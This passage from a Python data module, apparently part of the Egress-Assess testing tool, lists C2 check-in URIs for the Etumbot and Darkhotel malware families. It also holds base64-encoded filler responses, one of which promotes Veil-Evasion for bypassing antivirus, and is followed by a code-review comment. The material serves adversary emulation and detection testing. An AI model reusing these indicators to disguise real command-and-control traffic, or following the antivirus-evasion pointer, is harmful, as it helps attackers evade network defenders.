'AQAAAAAAAABlNjV3YjI0bjUAAAAAAAAAAAAAAG5FAVBvIz8hYk08ITI4BA0lMTBvBRx0NB18BndMcFMKQhR5PxxkQ3VnFEALeXA6C3RPBmJLHBBccHQINEl9I3kMUk0lOT4wCFgqD3khTjl5IEAqGzU_DmtUeEJBYSQHEiwRADteMEFjTw5oXgtjGkUxL14JPlwyYQQXPkVaQiAyUBEaJWlkOQEmZRoXZ10EN3RndH0kbEErew0NUklhFRlpNDJofS1hPQMCeWUvHSQPA2ZAPHEcCRkLPURbCC8bdTgIXXcIBhBbVlhjdB8iL2Y_TCNldTNjZkEvB0M5BWtaOkBALj4KIA5UBjhVPxhhSk1fAwdKKi8zdhl6TkthRUZAOQdICRgFEgY0dwpQNjtlQgR8DzM9N3NQBhteHgdwaVtycDZvS1Q3CTYhARI1GBMrWh1FQxcdQhV7MSx' +etumbot_uri = 
'/history/' +etumbot_uri2 = '/image/' +etumbot_uri3 = '/article/30441/Review.asp?' +etumbot_uri4 = '/manage/asp/item.asp?id=' +etumbot_uri5 = '/tech/s.asp?m=' +etumbot_extensions = '.jpg' +etumbot_extensions2 = '.asp' + +encoded_response = [ + 'dGhpc2lzZ29pbmd0b2JlIGEgcmVhbGx5IGJpZyByZXNwb25zZSBob3BlZnVsbHkuICBXZSByZWFsbHkgd2FudCB0aGVyZSB0byBiZSBhIGxvdCBvZiBkYXRhIHNvIHRoYXQgSSBjYW4gc2ltbGF0ZSB0aGUgd2ViIHJlc3BvbnNlIGJlaW5nIEMyIGNvbW1hbmRzIGZyb20gdGhlIHV0dW1ib3Qgc2VydmVyLiAgSSBkbyBub3Qga25vdyB3aGF0IGlzIGdvaW5nIHRvIGhhcHBlbiwgYnV0IEkgd2lsbCBjb250aW51ZSB0byB0cnkgdG8gZGV2ZWxvcCBhIGxvdCBvZiBtYWx3YXJlIG1vZHVsZSBmb3IgZWdyZXNzLWFzc2Vzcy4gIGl0IGhhcyBiZWVuIGEgbG90IG9mIGZ1bg--', + 'SSBhbSBnb2luZyB0byBjb250aW51ZSB0byBkZXZlbG9wIGVncmVzcy1hc3Nlc3MgbW9kdWxlcyBhbmQgdGhpcyBpcyBnb2luZyB0byBiZSBvbmUgb2YgdGhlbS4gIFRoZSBpbml0aWFsIHJlbGVhc2UgZm9yIHRoZXNlIG1hbHdhcmUgYW5kIEFQVCBncm91cCBtb2R1bGVzIGlzIGdvaW5nIHRvIGJlIGF0IFNBTlMgSEFDS0ZFU1QgaW4gd2FzaGluZ3RvbiBEQy4gIElmIHlvdSBhcmUgd2FudGluZyB0byBnZXQgdGhlIGxhdGVzdCBlZ3Jlc3MtYXNzZXNzIG1vZHVsZXMgdGhlIGVhcmxpZXN0IHRoYXQgeW91IGNhbiwgYmUgc3VyZSB0byBnZXQgdGhlcmUgYXQgSEFDS0ZFU1QgYW5kIHNlZSBzdGV2ZSBhbmQgSSB0YWxrLg--', + 'U3RldmUgaXMgdGhlIG1hbiwgYW5kIGhhcyBiZWVuIGdyZWF0IHRvIHdvcmsgd2l0aCBvbiBFZ3Jlc3MtQXNzZXNzLiAgSGUgd2FzIGFjdHVhbGx5IHRoZSBvbmUgd2hvIGNhbWUgdXAgd2l0aCB0aGUgaWRlYSBvZiBoYXZpbmcgdXMgZW11bGF0ZSBkaWZmZXJlbnQgcGllY2VzIG9mIG1hbHdhcmUgb3IgaGFja2luZyBncm91cHMuICBXZSB0YWxrZWQgYWJvdXQgaXQgYW5kIHRob3VnaHQgaXQgd2FzIGEgZ3JlYXQgaWRlYSwgc28gaGVyZSB3ZSBhcmUh', + 'VGhpcyBpcyBwcm9iYWJseSB0aGUgY2xvc2VzdCB0aGluZyB0byBhbiBlYXN0ZXIgZWdnIHRoYXQgd2UgaGF2ZSBjdXJyZW50bHkgaW4gRWdyZXNzLUFzc2Vzcy4gIFRoZXJlIGlzIG5vdCBhIGxvdCBvZiBvdGhlciBhcmVhcyB3aGVyZSBhbnl0aGluZyBjb3VsZCByZWFsbHkgYmUgaGlkZGVuIHdpdGhpbiB0aGlzIHByb2dyYW0sIGJ1dCBpdCB3b3VsZCBiZSBraW5kIG9mIGZ1bm55IHRvIGhlYXIgaWYgYW55b25lIGVsc2UgYWN0dWFsbHkgZmluZHMgdGhpcyBkYXRhLg--', + 
'T25lIHRoaW5nIHRoYXQgSSBkZWZpbml0ZWx5IGhhdmUgbGVhcm5lZCBpcyB0aGF0IGl0IGlzIGhhcmQgdG8gd29yayBvbiB3cml0aW5nIGRpZmZlcmVudCBzb2Z0d2FyZSBhbmQgaGF2ZSB0d28ga2lkcyBhdCB0aGUgc2FtZSB0aW1lLiAgSG9wZWZ1bGx5IEkgd2lsbCBiZSBhYmxlIHRvIGRvIHRoaXMsIGJ1dCBpdCB3aWxsIGJlIGEgbG90IGZhc3RlciBvbmNlIHRoZSBraWRzIGdldCBhIGxpdHRsZSBiaXQgb2xkZXIgYW5kIEkgY2FuIHRoZW4gc3BlbmQgbW9yZSB0aW1lIG9uIHRoaXMu', + 'U28gZmFyLCB3ZSBkbyBub3QgYWN0dWFsbHkgaGF2ZSBhbnlvbmUgdGhhdCBoYXMgc3VibWl0dGVkIGFueSBwdWxsIHJlcXVlc3RzIHRvIEVncmVzcy1Bc3Nlc3MuICBXZSBkZWZpbml0ZWx5IHRoaW5rIGl0IHdvdWxkIGJlIGF3ZXNvbWUgaWYgc29tZW9uZSBlbHNlIGFkZGVkIHNvbWUgZmVhdHVyZXMgdG8gRWdyZXNzLUFzc2Vzcywgb3Igc2VuZCB1cyBtb2R1bGVzIHNvIHRoYXQgd2UgY2FuIGdldCBpdCBhZGRlZCBpbiB0byB0aGUgdG9vbCE-', + 'VGhpcyB3aWxsIG1ha2UgbGlmZSBlYXN5LCBob3BlZnVsbHkgZXZlcnlvbmUgaXMgYWJsZSB0byB1c2UgdGhpcyB0b29sIHRvIHRlc3QgaWYgdGhlaXIgbmV0d29ya3MgYWN0dWFsbHkgY2F0Y2ggYW55IG9mIHRoZSBkYXRhIGxlYXZpbmcgdGhlaXIgbmV0d29yaywgb3IgYW55IG9mIHRoZSBwaWVjZXMgb2YgbWFsd2FyZSBvcGVyYXRpbmcgd2l0aGluIHRoZWlyIG5ldHdvcmsuICBZb3Ugc2hvdWxkIGFsbCB0ZXN0IGl0IG91dCBhbmQgc2VlIGlmIHlvdSBjYW4gY2F0Y2ggdGhpcyE-', + 'V2VsbCB0aGlzIGlzIGdvaW5nIHRvIGJlIHRoZSBsYXN0IGV0dW1ib3QgcmVzcG9uc2UgZm9yIG5vdy4gIElmIHNvbWVvbmUgZWxzZSBpcyBhY3R1YWxseSByZWFkaW5nIHRoZXNlLCB5b3Ugc2hvdWxkIGRlbW9uc3RyYXRlIHRoYXQgeW91IGhhdmUgcmVhZCB0aGVzZSBieSBhZGRpbmcgYSByZXNwb25zZSBzcGVjaWZpY2FsbHkgdGhpcyBldHVtYm90IHJlc3BvbnNlcy4gIEl0IHdpbGwgYmUgdGhpcyBsaXR0bGUgZWFzdGVyZWdnIDop', + 'SSB3b3VsZCByZWFsbHkgbGlrZSB0byB0aGluayB0aGF0IGF0IHNvbWUgcG9pbnQgSSBoYXZlIGdlbmVyYXRlZCBlbm91Z2ggb2YgdGhlc2UgZW5jb2RlZCBtb2R1bGVzLiAgSW4gdGhlIG1lYW50aW1lLCBzb21lIGZpbGxlciEgIFlvdSBndXlzIHNob3VsZCBiZSBzdXJlIHRvIGdvIHZpc2l0IG15IHdlYiBwYWdlIGF0IGNocmlzdG9waGVydHJ1bmNlci5jb20gYmVjYXVzZSBJIHRyeSB0byB3cml0ZSBzb21lIHVzZWZ1bCBhcnRpY2xlcyB0aGVyZSB0aGF0IGhlbHAgb3RoZXJzIGluIHRoZSBjb21tdW5pdHkh', + 
'QW5kIHRoaXMgaXMgYWN0dWFsbHkgdGhlIGxhc3Qgb25lIHRoYXQgSSBhbSBtYWtpbmcuICBJZiB5b3UgZ3V5cyB3YW50IHRvIGxlYXJuIGhvdyB0byBieXBhc3MgYW50aXZpcnVzLCBlc3BlY2lhbGx5IHNpbmNlIGl0IHJlYWxseSBpcyBqdXN0IGEgam9rZSwgeW91IHNob3VsZCBiZSBzdXJlIHRvIHBsYXkgYXJvdW5kIHdpdGggVmVpbC1FdmFzaW9uIGFuZCBsZWFybiBob3cgdG8gdXNlIGl0IGF0IHZlaWwtZnJhbWV3b3JrLmNvbS4gIEkgaG9wZSB0aGF0IHRoYXQgaGVscHMh'] + +darkhotel_checkin = '/major/images/view.php' +darkhotel_checkin2 = '/major/txt/read.php' +darkhotel_uri = '/bin/read_i.php?a1=' \ No newline at end of file
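Review bot: `malware_uris` is only ever tested with `in` (see the base_handler hunk) yet it is a plain list with many repeated entries ('/gate.php', '/file.php', '/images/gate.php', '/panel/config.jpg', '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php' each appear more than once), so membership is a linear scan over duplicates; wrapping it as `malware_uris = frozenset([` … `])` dedupes it and makes lookups O(1) without changing any caller. Two entries look inconsistent and are probably typos to confirm against the source list: the module ends the list with `'/home/index.asp?typeid=13'` but sets `etumbot_checkin = '/home/index.asp/typeid=13'` (slash instead of `?`), and `'/themes/panel/config.jp'` sits beside the earlier `'/themes/panel/config.jpg'`. The module docstring says only what the file is for; a short comment above each group stating which emulation module consumes it (e.g. `# URIs matched by GetHandler.do_POST for generic malware check-ins` over `malware_uris`, and the same for `other_apt_uris`, the `etumbot_*` and `darkhotel_*` names) would tell a maintainer where a change here is observed. The `etumbot_uri` … `etumbot_uri5` and `etumbot_extensions`/`etumbot_extensions2` naming suggests these want to be two lists rather than numbered variables, though that can wait for the consumer module.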